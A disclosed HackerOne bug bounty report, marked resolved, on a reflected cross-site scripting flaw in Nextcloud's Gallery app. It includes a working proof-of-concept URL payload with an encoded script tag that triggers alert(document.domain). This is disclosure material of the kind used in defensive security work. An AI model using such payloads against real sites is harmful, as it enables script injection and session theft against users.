Reflected XSS in Gallery App

Disclosed: 2016-12-03 22:01:12 By soreks To nextcloud
Medium
Vulnerability Details
Go to: `nextcloud/index.php/apps/gallery/#%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3Ejavascript:alert%280%29//%00` Tested on: Firefox 43.0.1 If you need more information then write me.
Actions
View on HackerOne
Report Stats
  • Report ID: 165686
  • State: Closed
  • Substate: resolved
  • Upvotes: 7
Share this report